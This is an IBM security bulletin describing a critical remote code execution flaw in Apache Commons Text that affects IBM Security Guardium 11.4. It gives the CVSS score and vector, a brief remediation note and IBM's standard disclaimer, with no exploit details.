**DESCRIPTION:**   Apache Commons Text could allow a remote attacker to execute arbitrary code on the system, caused by an insecure interpolation defaults flaw. By sending a specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238560 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Security Guardium

11.4

  

**Remediation/Fixes**

IBM strongly encourages customers to update their systems promptly.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

Desjardins

**Change History**

30 Nov 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSMPHH","label":"IBM Security Guardium"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"11.4","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

Tag

#linux